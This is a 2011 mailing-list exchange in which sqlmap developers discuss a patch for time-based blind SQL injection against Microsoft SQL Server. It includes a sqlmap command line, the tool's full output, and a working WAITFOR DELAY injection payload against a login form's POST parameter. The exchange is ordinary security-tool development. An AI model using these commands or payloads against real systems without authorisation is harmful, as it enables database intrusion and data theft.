Re: [sqlmap-users] New SQL Server blind test
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:54:43
|
hi again. have you tried to use it? i am interested in data retrieval part :))))) (please use -v 3) kr On Tue, Jan 18, 2011 at 1:48 AM, Steve Pinkham <ste...@gm...> wrote: > On 01/17/2011 07:02 PM, Miroslav Stampar wrote: >> Hi Steve. >> >> Thank you for your patch but I am not sure from SQL's perspective how >> this could work? >> >> So, basically, you are proposing time based sql injection payload (e.g.): >> >> IF(1=1) WAITFOR DELAY '0:0:1' >> >> and to be honest, I am not sure in which form, other than "stacked" >> this could fit in?? >> >> KR >> > Donno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-) > Should work as an OR or AND statement, but then the present logical > state of the query matters. > > > Here's the output from my successful run using the patch, sanitised for > public viewing: > ./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST > --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server' > > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 05:54:02 > > [05:54:02] [INFO] using 'bogonExampleData' as session file > [05:54:02] [INFO] testing connection to the target url > [05:54:02] [WARNING] the testable parameter 'id' you provided is not > into the Cookie > [05:54:02] [INFO] testing if the url is stable, wait a few seconds > [05:54:04] [INFO] url is stable > [05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might > not be injectable > [05:54:08] [INFO] testing sql injection on POST parameter 'id' > [05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause' > [05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - > WHERE clause' > [05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based' > [05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase > time-based' injectable > [05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns' > POST parameter 'id' is vulnerable. Do you want to keep testing the > others? [y/N] > sqlmap identified the following injection points with a total of 31 > HTTP(s) requests: > --- > Place: POST > Parameter: id > Type: stacked queries > Title: Microsoft SQL Server/Sybase time-based > Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf > --- > > [05:55:18] [INFO] testing Microsoft SQL Server > [05:55:38] [INFO] confirming Microsoft SQL Server > [05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows Vista > web application technology: ASP.NET, ASP, Microsoft IIS 7.0 > back-end DBMS: Microsoft SQL Server 2008 > [05:56:40] [WARNING] HTTP error codes detected during testing: > 500 (Internal Server Error) - 18 times > [05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData' > [*] shutting down at: 05:56:40 > > > > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |